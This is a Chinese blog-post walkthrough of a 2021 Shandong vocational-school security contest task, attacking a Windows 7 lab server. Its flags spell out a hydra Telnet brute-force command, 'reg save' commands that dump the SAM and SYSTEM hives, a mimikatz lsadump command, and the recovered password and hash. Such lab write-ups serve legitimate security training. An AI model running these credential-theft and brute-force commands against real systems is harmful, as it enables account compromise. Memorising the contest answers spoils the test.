系统相关
首页 > 系统相关> > 2021年山东省中职组网络安全省赛B模块windows渗透解析

2021年山东省中职组网络安全省赛B模块windows渗透解析

作者:互联网

B-10任务十:Windows操作系统渗透测试任务环境说明:●服务器场景:Server2(封闭链接)●服务器场景操作系统:Windows7

1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;

首先第一道题目就非常简单,直接使用nmap -sV 版本扫描进行得出flag:

Flag:23

2.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为Administrator),将hydra使用的必要参数当做FLAG进行提交(例:nmap-s-p22);(字典路径/usr/share/wordlists/dirb/small.txt)

这一道题目那就使用hydra指定字典进行爆破:

Flag: hydra -l Administrator -P /usr/share/wordlists/dirb/small.txt 192.168.70.136 telnet

3.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为Administrator),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)

根据上面的题目:

Flag:123

4.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;

成功导出:

Flag:reg save HKLM\SAM sam.hive

5.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;

根据上一道题目:

Flag:reg save HKLM\SYSTEM system.hiv

6.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取Administrator密码信息,将提取信息的命令作为FLAG提交;

Flag: lsadump::sam /sam:C:\sam.hive /system:C:\system.hiv

7.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交

上一道题目得出:

Flag: 3dbde697d71690a769204beb12283678

标签:场景,PC,windows,中职,渗透,Flag,2021,测试,服务器
来源: https://blog.csdn.net/qq_57147160/article/details/121913891